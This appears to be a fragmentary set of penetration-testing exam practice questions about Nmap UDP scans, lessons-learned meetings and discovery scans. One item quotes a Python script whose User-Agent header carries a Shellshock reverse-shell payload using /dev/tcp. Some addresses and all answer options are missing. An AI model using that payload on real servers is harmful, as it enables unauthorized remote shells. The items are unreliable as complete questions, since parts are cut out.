A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?
A penetration tester discovers a vulnerable web server at The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/ 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?
A penetration tester conducted a discovery scan that generated the following:
Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?